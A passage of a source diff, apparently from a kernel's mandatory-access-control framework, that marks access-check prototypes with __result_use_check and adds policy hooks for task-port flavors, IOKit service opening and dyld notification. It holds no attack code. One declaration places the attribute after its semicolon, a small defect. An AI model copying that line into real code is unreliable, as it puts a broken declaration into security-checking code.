 int     mac_socket_check_received(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *saddr);
+    struct sockaddr *saddr) __result_use_check;
 int     mac_socket_check_send(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *addr);
+    struct sockaddr *addr) __result_use_check;
 int     mac_socket_check_getsockopt(kauth_cred_t cred, struct socket *so,
-    struct sockopt *sopt);
+    struct sockopt *sopt) __result_use_check;
 int     mac_socket_check_setsockopt(kauth_cred_t cred, struct socket *so,
-    struct sockopt *sopt);
-int     mac_socket_check_stat(kauth_cred_t cred, struct socket *so);
+    struct sockopt *sopt) __result_use_check;
+int     mac_socket_check_stat(kauth_cred_t cred, struct socket *so) __result_use_check;
 void    mac_socket_label_associate(kauth_cred_t cred, struct socket *so);
 void    mac_socket_label_associate_accept(struct socket *oldsocket,
     struct socket *newsocket);
 void    mac_socket_label_copy(struct label *from, struct label *to);
 void    mac_socket_label_destroy(struct socket *);
 int     mac_socket_label_get(kauth_cred_t cred, struct socket *so,
-    struct mac *extmac);
-int     mac_socket_label_init(struct socket *, int waitok);
+    struct mac *extmac) __result_use_check;
+int     mac_socket_label_init(struct socket *, int waitok) __result_use_check;
 void    mac_socketpeer_label_associate_socket(struct socket *peersocket,
     struct socket *socket_to_modify);
 int     mac_socketpeer_label_get(kauth_cred_t cred, struct socket *so,
-    struct mac *extmac);
-int     mac_system_check_acct(kauth_cred_t cred, struct vnode *vp);
-int     mac_system_check_audit(kauth_cred_t cred, void *record, int length);
-int     mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp);
-int     mac_system_check_auditon(kauth_cred_t cred, int cmd);
-int     mac_system_check_host_priv(kauth_cred_t cred);
-int     mac_system_check_info(kauth_cred_t, const char *info_type);
-int     mac_system_check_nfsd(kauth_cred_t cred);
-int     mac_system_check_reboot(kauth_cred_t cred, int howto);
-int     mac_system_check_settime(kauth_cred_t cred);
-int     mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp);
-int     mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp);
+    struct mac *extmac) __result_use_check;
+int     mac_system_check_acct(kauth_cred_t cred, struct vnode *vp) __result_use_check;
+int     mac_system_check_audit(kauth_cred_t cred, void *record, int length) __result_use_check;
+int     mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp) __result_use_check;
+int     mac_system_check_auditon(kauth_cred_t cred, int cmd) __result_use_check;
+int     mac_system_check_host_priv(kauth_cred_t cred) __result_use_check;
+int     mac_system_check_info(kauth_cred_t, const char *info_type) __result_use_check;
+int     mac_system_check_nfsd(kauth_cred_t cred) __result_use_check;
+int     mac_system_check_reboot(kauth_cred_t cred, int howto) __result_use_check;
+int     mac_system_check_settime(kauth_cred_t cred) __result_use_check;
+int     mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp) __result_use_check;
+int     mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp) __result_use_check;
 int     mac_system_check_sysctlbyname(kauth_cred_t cred, const char *namestring, int *name,
     size_t namelen, user_addr_t oldctl, size_t oldlen,
-    user_addr_t newctl, size_t newlen);
-int     mac_system_check_kas_info(kauth_cred_t cred, int selector);
+    user_addr_t newctl, size_t newlen) __result_use_check;
+int     mac_system_check_kas_info(kauth_cred_t cred, int selector) __result_use_check;
 void    mac_sysvmsg_label_associate(kauth_cred_t cred,
     struct msqid_kernel *msqptr, struct msg *msgptr);
 void    mac_sysvmsg_label_init(struct msg *msgptr);
 void    mac_sysvmsg_label_recycle(struct msg *msgptr);
 int     mac_sysvmsq_check_enqueue(kauth_cred_t cred, struct msg *msgptr,
-    struct msqid_kernel *msqptr);
-int     mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr);
-int     mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr);
+    struct msqid_kernel *msqptr) __result_use_check;
+int     mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr) __result_use_check;
+int     mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr) __result_use_check;
 int     mac_sysvmsq_check_msqctl(kauth_cred_t cred,
-    struct msqid_kernel *msqptr, int cmd);
+    struct msqid_kernel *msqptr, int cmd) __result_use_check;
 int     mac_sysvmsq_check_msqget(kauth_cred_t cred,
-    struct msqid_kernel *msqptr);
+    struct msqid_kernel *msqptr) __result_use_check;
 int     mac_sysvmsq_check_msqrcv(kauth_cred_t cred,
-    struct msqid_kernel *msqptr);
+    struct msqid_kernel *msqptr) __result_use_check;
 int     mac_sysvmsq_check_msqsnd(kauth_cred_t cred,
-    struct msqid_kernel *msqptr);
+    struct msqid_kernel *msqptr) __result_use_check;
 void    mac_sysvmsq_label_associate(kauth_cred_t cred,
     struct msqid_kernel *msqptr);
 void    mac_sysvmsq_label_init(struct msqid_kernel *msqptr);
 void    mac_sysvmsq_label_recycle(struct msqid_kernel *msqptr);
 int     mac_sysvsem_check_semctl(kauth_cred_t cred,
-    struct semid_kernel *semakptr, int cmd);
+    struct semid_kernel *semakptr, int cmd) __result_use_check;
 int     mac_sysvsem_check_semget(kauth_cred_t cred,
-    struct semid_kernel *semakptr);
+    struct semid_kernel *semakptr) __result_use_check;
 int     mac_sysvsem_check_semop(kauth_cred_t cred,
-    struct semid_kernel *semakptr, size_t accesstype);
+    struct semid_kernel *semakptr, size_t accesstype) __result_use_check;
 void    mac_sysvsem_label_associate(kauth_cred_t cred,
     struct semid_kernel *semakptr);
 void    mac_sysvsem_label_destroy(struct semid_kernel *semakptr);
 void    mac_sysvsem_label_init(struct semid_kernel *semakptr);
 void    mac_sysvsem_label_recycle(struct semid_kernel *semakptr);
 int     mac_sysvshm_check_shmat(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr, int shmflg);
+    struct shmid_kernel *shmsegptr, int shmflg) __result_use_check;
 int     mac_sysvshm_check_shmctl(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr, int cmd);
+    struct shmid_kernel *shmsegptr, int cmd) __result_use_check;
 int     mac_sysvshm_check_shmdt(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr);
+    struct shmid_kernel *shmsegptr) __result_use_check;
 int     mac_sysvshm_check_shmget(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr, int shmflg);
+    struct shmid_kernel *shmsegptr, int shmflg) __result_use_check;
 void    mac_sysvshm_label_associate(kauth_cred_t cred,
     struct shmid_kernel *shmsegptr);
 void    mac_sysvshm_label_destroy(struct shmid_kernel *shmsegptr);
 void    mac_sysvshm_label_init(struct shmid_kernel* shmsegptr);
 void    mac_sysvshm_label_recycle(struct shmid_kernel *shmsegptr);
 int     mac_vnode_check_access(vfs_context_t ctx, struct vnode *vp,
-    int acc_mode);
-int     mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp);
+    int acc_mode) __result_use_check;
+int     mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp) __result_use_check;
 int     mac_vnode_check_chroot(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp);
+    struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_clone(vfs_context_t ctx, struct vnode *dvp,
-    struct vnode *vp, struct componentname *cnp);
+    struct vnode *vp, struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_create(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp, struct vnode_attr *vap);
+    struct componentname *cnp, struct vnode_attr *vap) __result_use_check;
 int     mac_vnode_check_deleteextattr(vfs_context_t ctx, struct vnode *vp,
-    const char *name);
+    const char *name) __result_use_check;
 int     mac_vnode_check_exchangedata(vfs_context_t ctx, struct vnode *v1,
-    struct vnode *v2);
+    struct vnode *v2) __result_use_check;
 int     mac_vnode_check_exec(vfs_context_t ctx, struct vnode *vp,
-    struct image_params *imgp);
-int     mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp);
+    struct image_params *imgp) __result_use_check;
+int     mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_getattr(vfs_context_t ctx, struct ucred *file_cred,
-    struct vnode *vp, struct vnode_attr *va);
+    struct vnode *vp, struct vnode_attr *va) __result_use_check;
 int     mac_vnode_check_getattrlist(vfs_context_t ctx, struct vnode *vp,
-    struct attrlist *alist);
+    struct attrlist *alist) __result_use_check;
 int     mac_vnode_check_getextattr(vfs_context_t ctx, struct vnode *vp,
-    const char *name, struct uio *uio);
+    const char *name, struct uio *uio) __result_use_check;
 int     mac_vnode_check_ioctl(vfs_context_t ctx, struct vnode *vp,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_vnode_check_kqfilter(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct knote *kn, struct vnode *vp);
+    kauth_cred_t file_cred, struct knote *kn, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_label_update(vfs_context_t ctx, struct vnode *vp,
-    struct label *newlabel);
+    struct label *newlabel); __result_use_check
 int     mac_vnode_check_link(vfs_context_t ctx, struct vnode *dvp,
-    struct vnode *vp, struct componentname *cnp);
-int     mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp);
+    struct vnode *vp, struct componentname *cnp) __result_use_check;
+int     mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_lookup(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp);
+    struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_lookup_preflight(vfs_context_t ctx, struct vnode *dvp,
-    const char *path, size_t pathlen);
+    const char *path, size_t pathlen) __result_use_check;
 int     mac_vnode_check_open(vfs_context_t ctx, struct vnode *vp,
-    int acc_mode);
+    int acc_mode) __result_use_check;
 int     mac_vnode_check_read(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
-int     mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp);
-int     mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
+int     mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp) __result_use_check;
+int     mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_rename(vfs_context_t ctx, struct vnode *dvp,
     struct vnode *vp, struct componentname *cnp, struct vnode *tdvp,
-    struct vnode *tvp, struct componentname *tcnp);
-int     mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp);
+    struct vnode *tvp, struct componentname *tcnp) __result_use_check;
+int     mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_searchfs(vfs_context_t ctx, struct vnode *vp,
-    struct attrlist *alist);
+    struct attrlist *alist) __result_use_check;
 int     mac_vnode_check_select(vfs_context_t ctx, struct vnode *vp,
-    int which);
+    int which) __result_use_check;
 int     mac_vnode_check_setacl(vfs_context_t ctx, struct vnode *vp,
-    struct kauth_acl *acl);
+    struct kauth_acl *acl) __result_use_check;
 int     mac_vnode_check_setattrlist(vfs_context_t ctxd, struct vnode *vp,
-    struct attrlist *alist);
+    struct attrlist *alist) __result_use_check;
 int     mac_vnode_check_setextattr(vfs_context_t ctx, struct vnode *vp,
-    const char *name, struct uio *uio);
+    const char *name, struct uio *uio) __result_use_check;
 int     mac_vnode_check_setflags(vfs_context_t ctx, struct vnode *vp,
-    u_long flags);
+    u_long flags) __result_use_check;
 int     mac_vnode_check_setmode(vfs_context_t ctx, struct vnode *vp,
-    mode_t mode);
+    mode_t mode) __result_use_check;
 int     mac_vnode_check_setowner(vfs_context_t ctx, struct vnode *vp,
-    uid_t uid, gid_t gid);
+    uid_t uid, gid_t gid) __result_use_check;
 int     mac_vnode_check_setutimes(vfs_context_t ctx, struct vnode *vp,
-    struct timespec atime, struct timespec mtime);
+    struct timespec atime, struct timespec mtime) __result_use_check;
 int     mac_vnode_check_signature(struct vnode *vp,
     struct cs_blob *cs_blob, struct image_params *imgp,
     unsigned int *cs_flags, unsigned int *signer_type,
-    int flags, unsigned int platform);
+    int flags, unsigned int platform) __result_use_check;
 int     mac_vnode_check_supplemental_signature(struct vnode *vp,
     struct cs_blob *cs_blob, struct vnode *linked_vp,
-    struct cs_blob *linked_cs_blob, unsigned int *signer_type);
+    struct cs_blob *linked_cs_blob, unsigned int *signer_type) __result_use_check;
 int     mac_vnode_check_stat(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
 #ifdef KERNEL_PRIVATE
 int     mac_vnode_check_trigger_resolve(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp);
+    struct componentname *cnp) __result_use_check;
 #endif
 int     mac_vnode_check_truncate(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_uipc_bind(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp, struct vnode_attr *vap);
-int     mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so);
+    struct componentname *cnp, struct vnode_attr *vap) __result_use_check;
+int     mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so) __result_use_check;
 int     mac_vnode_check_unlink(vfs_context_t ctx, struct vnode *dvp,
-    struct vnode *vp, struct componentname *cnp);
+    struct vnode *vp, struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_write(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
 struct label    *mac_vnode_label_alloc(void);
 int     mac_vnode_label_associate(struct mount *mp, struct vnode *vp,
-    vfs_context_t ctx);
+    vfs_context_t ctx) __result_use_check;
 void    mac_vnode_label_associate_devfs(struct mount *mp, struct devnode *de,
     struct vnode *vp);
-int     mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp);
+int     mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp) __result_use_check;
 int     mac_vnode_label_associate_fdesc(struct mount *mp, struct fdescnode *fnp,
-    struct vnode *vp, vfs_context_t ctx);
+    struct vnode *vp, vfs_context_t ctx) __result_use_check;
 void    mac_vnode_label_associate_singlelabel(struct mount *mp,
     struct vnode *vp);
 void    mac_vnode_label_copy(struct label *l1, struct label *l2);
 void    mac_vnode_label_destroy(struct vnode *vp);
-int     mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac);
+int     mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac) __result_use_check;
 void    mac_vnode_label_free(struct label *label);
 void    mac_vnode_label_init(struct vnode *vp);
-int     mac_vnode_label_init_needed(struct vnode *vp);
+int     mac_vnode_label_init_needed(struct vnode *vp) __result_use_check;
 #ifdef KERNEL_PRIVATE
 struct label *mac_vnode_label_allocate(vnode_t vp);
 #endif
@@ -524,7 +528,7 @@ void    mac_vnode_label_update(vfs_context_t ctx, struct vnode *vp,
 void    mac_vnode_label_update_extattr(struct mount *mp, struct vnode *vp,
     const char *name);
 int     mac_vnode_notify_create(vfs_context_t ctx, struct mount *mp,
-    struct vnode *dvp, struct vnode *vp, struct componentname *cnp);
+    struct vnode *dvp, struct vnode *vp, struct componentname *cnp) __result_use_check;
 void    mac_vnode_notify_deleteextattr(vfs_context_t ctx, struct vnode *vp, const char *name);
 void    mac_vnode_notify_link(vfs_context_t ctx, struct vnode *vp,
     struct vnode *dvp, struct componentname *cnp);
@@ -539,17 +543,17 @@ void    mac_vnode_notify_setmode(vfs_context_t ctx, struct vnode *vp, mode_t mod
 void    mac_vnode_notify_setowner(vfs_context_t ctx, struct vnode *vp, uid_t uid, gid_t gid);
 void    mac_vnode_notify_setutimes(vfs_context_t ctx, struct vnode *vp, struct timespec atime, struct timespec mtime);
 void    mac_vnode_notify_truncate(vfs_context_t ctx, kauth_cred_t file_cred, struct vnode *vp);
-int     mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho);
+int     mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho) __result_use_check;
 int     vnode_label(struct mount *mp, struct vnode *dvp, struct vnode *vp,
-    struct componentname *cnp, int flags, vfs_context_t ctx);
+    struct componentname *cnp, int flags, vfs_context_t ctx) __result_use_check;
 void    vnode_relabel(struct vnode *vp);
 void    mac_pty_notify_grant(proc_t p, struct tty *tp, dev_t dev, struct label *label);
 void    mac_pty_notify_close(proc_t p, struct tty *tp, dev_t dev, struct label *label);
-int     mac_kext_check_load(kauth_cred_t cred, const char *identifier);
-int     mac_kext_check_unload(kauth_cred_t cred, const char *identifier);
-int     mac_kext_check_query(kauth_cred_t cred);
-int     mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol);
-int     mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol);
+int     mac_kext_check_load(kauth_cred_t cred, const char *identifier) __result_use_check;
+int     mac_kext_check_unload(kauth_cred_t cred, const char *identifier) __result_use_check;
+int     mac_kext_check_query(kauth_cred_t cred) __result_use_check;
+int     mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check;
+int     mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check;
 void    mac_vnode_notify_reclaim(vnode_t vp);
 
 void psem_label_associate(struct fileproc *fp, struct vnode *vp, struct vfs_context *ctx);
index fe1f43ac0896b0472b98b04b3bc08465c62ebd95..a6946e80b9681efdbbbd00e5227da24c133ca1ef 100644 (file)
 #include <security/mac_framework.h>
 #include <security/mac_internal.h>
 
+int
+mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type)
+{
+       int error;
+
+       MAC_CHECK(iokit_check_open_service, cred, service, user_client_type);
+       return error;
+}
+
 int
 mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type)
 {
index 4739336fb1dfbb566596b4c30a39d489b7779d81..a1bb852f37fbb897e26b4a63a71d827c552eeb6e 100644 (file)
@@ -75,10 +75,12 @@ mac_task_get_proc(struct task *task)
 }
 
 int
-mac_task_check_expose_task(struct task *task)
+mac_task_check_expose_task(struct task *task, mach_task_flavor_t flavor)
 {
        int error;
 
+       assert(flavor <= TASK_FLAVOR_NAME);
+
        struct proc *p = mac_task_get_proc(task);
        if (p == NULL) {
                return ESRCH;
@@ -87,7 +89,51 @@ mac_task_check_expose_task(struct task *task)
 
        struct ucred *cred = kauth_cred_get();
        proc_rele(p);
-       MAC_CHECK(proc_check_expose_task, cred, &pident);
+
+       /* Also call the old hook for compatability, deprecating in rdar://66356944. */
+       if (flavor == TASK_FLAVOR_CONTROL) {
+               MAC_CHECK(proc_check_expose_task, cred, &pident);
+               if (error) {
+                       return error;
+               }
+       }
+
+       MAC_CHECK(proc_check_expose_task_with_flavor, cred, &pident, flavor);
+
+       return error;
+}
+
+int
+mac_task_check_task_id_token_get_task(struct task *task, mach_task_flavor_t flavor)
+{
+       int error;
+
+       assert(flavor <= TASK_FLAVOR_NAME);
+
+       struct proc *p = mac_task_get_proc(task);
+       if (p == NULL) {
+               return ESRCH;
+       }
+       struct proc_ident pident = proc_ident(p);
+
+       proc_rele(p);
+
+       p = current_proc();
+       kauth_cred_t cred = kauth_cred_proc_ref(p);
+       MAC_CHECK(proc_check_task_id_token_get_task, cred, &pident, flavor);
+       kauth_cred_unref(&cred);
+       return error;
+}
+
+int
+mac_task_check_get_movable_control_port(void)
+{
+       int error;
+       struct proc *p = current_proc();
+
+       kauth_cred_t cred = kauth_cred_proc_ref(p);
+       MAC_CHECK(proc_check_get_movable_control_port, cred);
+       kauth_cred_unref(&cred);
        return error;
 }
 
@@ -125,6 +171,18 @@ mac_task_check_set_host_exception_port(struct task *task, unsigned int exception
        return error;
 }
 
+int
+mac_task_check_dyld_process_info_notify_register(void)
+{
+       int error;
+       struct proc *p = current_proc();
+
+       kauth_cred_t cred = kauth_cred_proc_ref(p);
+       MAC_CHECK(proc_check_dyld_process_info_notify_register, cred);
+       kauth_cred_unref(&cred);
+       return error;
+}
+
 int
 mac_task_check_set_host_exception_ports(struct task *task, unsigned int exception_mask)
 {
index 3e716ebd607c9755bda6840dfccd0a493c950782..ba59e1b843f3003a5fb0f020316bf5f6227d4266 100644 (file)
@@ -74,14 +74,16 @@ void mac_policy_init(void);
 void mac_policy_initmach(void);
 
 /* tasks */
-int    mac_task_check_expose_task(struct task *t);
-
+int    mac_task_check_expose_task(struct task *t, mach_task_flavor_t flavor);
+int    mac_task_check_task_id_token_get_task(struct task *t, mach_task_flavor_t flavor);
 int    mac_task_check_set_host_special_port(struct task *task,
            int id, struct ipc_port *port);
 int    mac_task_check_set_host_exception_port(struct task *task,
            unsigned int exception);
 int    mac_task_check_set_host_exception_ports(struct task *task,
            unsigned int exception_mask);
+int mac_task_check_get_movable_control_port(void);
+int mac_task_check_dyld_process_info_notify_register(void);
 
 /* See rdar://problem/58989880 */
 #ifndef bitstr_test
@@ -92,7 +94,7 @@ typedef int (*mac_task_mach_filter_cbfunc_t)(struct proc *bsdinfo, int num);
 typedef int (*mac_task_kobj_filter_cbfunc_t)(struct proc *bsdinfo, int msgid, int index);
 extern mac_task_mach_filter_cbfunc_t mac_task_mach_trap_evaluate;
 extern mac_task_kobj_filter_cbfunc_t mac_task_kobj_msg_evaluate;
-extern int mach_trap_count;
+extern const int mach_trap_count;
 extern int mach_kobj_count;
 
 void mac_task_set_mach_filter_mask(struct task *task, uint8_t *maskptr);
index 08adb58fb393a36612ace96547c1a828dbafaf75..cd87e78623c7fce9a025849836668edfa12fe319 100644 (file)
@@ -1059,7 +1059,8 @@ typedef void mpo_file_label_init_t(
  *
  *  Determine whether the subject identified by the credential can open an
  *  I/O Kit device at the passed path of the passed user client class and
- *  type.
+ *  type.  This check is performed after instantiating the user client.
+ *  See also mpo_iokit_check_open_service_t.
  *
  *  @return Return 0 if access is granted, or an appropriate value for
  *  errno should be returned.
@@ -1069,6 +1070,25 @@ typedef int mpo_iokit_check_open_t(
        io_object_t user_client,
        unsigned int user_client_type
        );
+/**
+ *  @brief Access control check for opening an I/O Kit device
+ *  @param cred Subject credential
+ *  @param service Service instance
+ *  @param user_client_type User client type
+ *
+ *  Determine whether the subject identified by the credential can open a
+ *  I/O Kit user client of the passed service and user client type.
+ *  This check is performed before instantiating the user client.  See also
+ *  mpo_iokit_check_open_t.
+ *
+ *  @return Return 0 if access is granted, or an appropriate value for
+ *  errno should be returned.
+ */
+typedef int mpo_iokit_check_open_service_t(
+       kauth_cred_t cred,
+       io_object_t service,
+       unsigned int user_client_type
+       );
 /**
  *  @brief Access control check for setting I/O Kit device properties
  *  @param cred Subject credential
@@ -2152,6 +2172,27 @@ typedef int mpo_proc_check_set_host_exception_port_t(
        kauth_cred_t cred,
        unsigned int exception
        );
+/**
+ *  @brief Access control check for getting movable task/thread control port for current task.
+ *  @param cred Subject credential
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned.
+ */
+typedef int mpo_proc_check_get_movable_control_port_t(
+       kauth_cred_t cred
+       );
+/**
+ *  @brief Access control check for calling task_dyld_process_info_notify_register
+ *  and task_dyld_process_info_notify_deregister.
+ *  @param cred Subject credential
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned.
+ */
+typedef int mpo_proc_check_dyld_process_info_notify_register_t(
+       kauth_cred_t cred
+       );
 /**
  *  @brief Access control over pid_suspend, pid_resume and family
  *  @param cred Subject credential
@@ -3494,6 +3535,26 @@ typedef int mpo_proc_check_get_task_t(
        struct proc_ident *pident
        );
 
+/**
+ *  @brief Access control check for getting a process's task ports of different flavors
+ *  @param cred Subject credential
+ *  @param pident Object unique process identifier
+ *  @param flavor Requested task port flavor
+ *
+ *  Determine whether the subject identified by the credential can get
+ *  the passed process's task port of given flavor.
+ *  This call is used by the task_{,read,inspect,name}_for_pid(2) API.
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned. Suggested failure: EACCES for label mismatch,
+ *  EPERM for lack of privilege, or ESRCH to hide visibility of the target.
+ */
+typedef int mpo_proc_check_get_task_with_flavor_t(
+       kauth_cred_t cred,
+       struct proc_ident *pident,
+       mach_task_flavor_t flavor
+       );
+
 /**
  *  @brief Access control check for exposing a process's task port
  *  @param cred Subject credential
@@ -3513,6 +3574,47 @@ typedef int mpo_proc_check_expose_task_t(
        struct proc_ident *pident
        );
 
+/**
+ *  @brief Access control check for exposing a process's task ports of different flavors
+ *  @param cred Subject credential
+ *  @param pident Object unique process identifier
+ *  @param flavor Requested task port flavor
+ *
+ *  Determine whether the subject identified by the credential can expose
+ *  the passed process's task port of given flavor.
+ *  This call is used by the accessor APIs like processor_set_tasks() and
+ *  processor_set_threads().
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned. Suggested failure: EACCES for label mismatch,
+ *  EPERM for lack of privilege, or ESRCH to hide visibility of the target.
+ */
+typedef int mpo_proc_check_expose_task_with_flavor_t(
+       kauth_cred_t cred,
+       struct proc_ident *pident,
+       mach_task_flavor_t flavor
+       );
+
+/**
+ *  @brief Access control check for upgrading to task port with a task identity token
+ *  @param cred Subject credential
+ *  @param pident Object unique process identifier
+ *  @param flavor Requested task port flavor
+ *
+ *  Determine whether the subject identified by the credential can upgrade to task port
+ *  of given flavor with a task identity token of the passed process.
+ *  This call is used by task_identity_token_get_task_port().
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned. Suggested failure: EACCES for label mismatch,
+ *  EPERM for lack of privilege, or ESRCH to hide visibility of the target.
+ */
+typedef int mpo_proc_check_task_id_token_get_task_t(
+       kauth_cred_t cred,
+       struct proc_ident *pident,
+       mach_task_flavor_t flavor
+       );
+
 /**
  *  @brief Check whether task's IPC may inherit across process exec
  *  @param p current process instance
@@ -5342,7 +5444,7 @@ typedef void mpo_reserved_hook_t(void);
  * Please note that this should be kept in sync with the check assumptions
  * policy in bsd/kern/policy_check.c (policy_ops struct).
  */
-#define MAC_POLICY_OPS_VERSION 69 /* inc when new reserved slots are taken */
+#define MAC_POLICY_OPS_VERSION 74 /* inc when new reserved slots are taken */
 struct mac_policy_ops {
        mpo_audit_check_postselect_t            *mpo_audit_check_postselect;
        mpo_audit_check_preselect_t             *mpo_audit_check_preselect;
@@ -5450,9 +5552,9 @@ struct mac_policy_ops {
        mpo_mount_label_init_t                  *mpo_mount_label_init;
        mpo_mount_label_internalize_t           *mpo_mount_label_internalize;
 
-       mpo_reserved_hook_t                     *mpo_reserved38;
-       mpo_reserved_hook_t                     *mpo_reserved39;
-       mpo_reserved_hook_t                     *mpo_reserved40;
+       mpo_proc_check_expose_task_with_flavor_t *mpo_proc_check_expose_task_with_flavor;
+       mpo_proc_check_get_task_with_flavor_t   *mpo_proc_check_get_task_with_flavor;
+       mpo_proc_check_task_id_token_get_task_t *mpo_proc_check_task_id_token_get_task;
 
        mpo_pipe_check_ioctl_t                  *mpo_pipe_check_ioctl;
        mpo_pipe_check_kqfilter_t               *mpo_pipe_check_kqfilter;
@@ -5481,7 +5583,7 @@ struct mac_policy_ops {
        mpo_proc_notify_exec_complete_t         *mpo_proc_notify_exec_complete;
        mpo_proc_notify_cs_invalidated_t        *mpo_proc_notify_cs_invalidated;
        mpo_proc_check_syscall_unix_t           *mpo_proc_check_syscall_unix;
-       mpo_proc_check_expose_task_t            *mpo_proc_check_expose_task;
+       mpo_proc_check_expose_task_t            *mpo_proc_check_expose_task;            /* Deprecating, use mpo_proc_check_expose_task_with_flavor instead */
        mpo_proc_check_set_host_special_port_t  *mpo_proc_check_set_host_special_port;
        mpo_proc_check_set_host_exception_port_t *mpo_proc_check_set_host_exception_port;
        mpo_exc_action_check_exception_send_t   *mpo_exc_action_check_exception_send;
@@ -5518,8 +5620,8 @@ struct mac_policy_ops {
 
        mpo_proc_check_debug_t                  *mpo_proc_check_debug;
        mpo_proc_check_fork_t                   *mpo_proc_check_fork;
-       mpo_proc_check_get_task_name_t          *mpo_proc_check_get_task_name;
-       mpo_proc_check_get_task_t               *mpo_proc_check_get_task;
+       mpo_proc_check_get_task_name_t          *mpo_proc_check_get_task_name; /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */
+       mpo_proc_check_get_task_t               *mpo_proc_check_get_task;      /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */
        mpo_proc_check_getaudit_t               *mpo_proc_check_getaudit;
        mpo_proc_check_getauid_t                *mpo_proc_check_getauid;
        mpo_proc_check_getlcid_t                *mpo_proc_check_getlcid;
@@ -5550,8 +5652,8 @@ struct mac_policy_ops {
        mpo_socket_check_setsockopt_t           *mpo_socket_check_setsockopt;
        mpo_socket_check_getsockopt_t           *mpo_socket_check_getsockopt;
 
-       mpo_reserved_hook_t                     *mpo_reserved50;
-       mpo_reserved_hook_t                     *mpo_reserved51;
+       mpo_proc_check_get_movable_control_port_t *mpo_proc_check_get_movable_control_port;
+       mpo_proc_check_dyld_process_info_notify_register_t *mpo_proc_check_dyld_process_info_notify_register;
        mpo_reserved_hook_t                     *mpo_reserved52;
        mpo_reserved_hook_t                     *mpo_reserved53;
        mpo_reserved_hook_t                     *mpo_reserved54;
@@ -5562,7 +5664,8 @@ struct mac_policy_ops {
        mpo_reserved_hook_t                     *mpo_reserved59;
        mpo_reserved_hook_t                     *mpo_reserved60;
        mpo_reserved_hook_t                     *mpo_reserved61;
-       mpo_reserved_hook_t                     *mpo_reserved62;
+
+       mpo_iokit_check_open_service_t          *mpo_iokit_check_open_service;
 
        mpo_system_check_acct_t                 *mpo_system_check_acct;
